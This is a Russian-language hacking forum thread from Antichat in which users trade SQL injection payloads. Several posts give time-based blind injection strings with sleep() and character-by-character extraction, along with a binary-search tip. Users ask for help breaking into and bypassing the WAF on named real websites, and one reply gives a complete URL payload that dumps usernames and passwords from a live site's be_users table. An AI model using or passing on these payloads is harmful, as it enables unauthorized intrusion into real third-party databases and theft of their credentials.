ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

29.06.2020, 14:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 1238
Репутация:
0
|
|
Привет.
Подскажите, плиз.
Как правильно видоизменить нагрузку вида
Код:
Code:
'OR(if(now()=sysdate(),sleep(3),0))OR'*/
для того чтобы начать перебирать символы, например, чтобы получить значение
базы данных.
Не хватает понимания
По идее так
Код:
Code:
'OR(if(substring(version((),1,1)='m',sleep(3),0))OR'*/
, да?
Cпасибо.
|
|
|
|

29.06.2020, 14:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от testvalue
testvalue said:
↑
Привет.
Подскажите, плиз.
Как правильно видоизменить нагрузку вида
Код:
Code:
'OR(if(now()=sysdate(),sleep(3),0))OR'*/
для того чтобы начать перебирать символы, например, чтобы получить значение
базы данных.
Не хватает понимания
Cпасибо.
Что-бы узнать имеет-ли 2-ой символ значение 'A':
Код:
Code:
'OR(if(substring(version(),2,1)='А'),sleep(3),0))OR'*/
ещё лучше перебирать по ASCII (53='5') т.е. является ли 2ой символ цифрой 5:
Код:
Code:
'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0))OR'*/
|
|
|
|

29.06.2020, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 1238
Репутация:
0
|
|
Спасибо большое, дружище, сейчас пойду пробовать
|
|
|
|

30.06.2020, 17:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
|
|
|
|

09.07.2020, 20:58
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Какие шеллы сейчас актуальны?
|
|
|

09.07.2020, 21:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 1238
Репутация:
0
|
|
Привет.
Помогите докрутить скулю и обойти WAF.
https://www.hbo.ro/TitleDetail.aspx?ScheduleId='OR(if(now()=sysdate() ,sleep(5),0))OR'xxx -> True, задержка 5 секунд
На sleep() реагирует, и видно, что там есть скуля, но при попытке извлечь например, version() или user() cудя по всему срабатывает WAF.
Пытался через вектор 'OR(if(ASCII(SUBSTR(VERSION(),1,1))=53),sleep(3),0 ))OR', но облом.
Спасибо.
|
|
|
|

23.07.2020, 21:01
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Помогите раскрутить, все идёт с запроса в LIKE
Код:
Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22
|
|
|

23.07.2020, 23:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 5363
Репутация:
12
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Помогите раскрутить, все идёт с запроса в LIKE
Код:
Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22
Код:
Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22/**/or/**/(extractvalue(0x0a,concat(0x0a,(select(group_concat(concat_ws(0x3a,username,password)))from(be_users)))))=%22
|
|
|
|

25.07.2020, 21:39
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме: 16896
Репутация:
0
|
|
здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?
|
|
|

25.07.2020, 23:40
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме: 16896
Репутация:
0
|
|
Сообщение от fandor9
fandor9 said:
↑
'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0 ))OR'*/
еще можно не сравнением а бинарным поиском через >= к примеру если хочешь знаешь что только цифры
Код:
Code:
'OR(if(ASCII(SUBSTR(VERSION(),2,1))>=53),sleep(3),0))OR'*
сработало, то берем среднее число из диапазона между 53 и 57, к примеру >=55. не сработало значит чекаешь 53,54. если сработало то 55,56,57. очень ускоряет когда нужно искать цифры и буквы в разном регистре
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|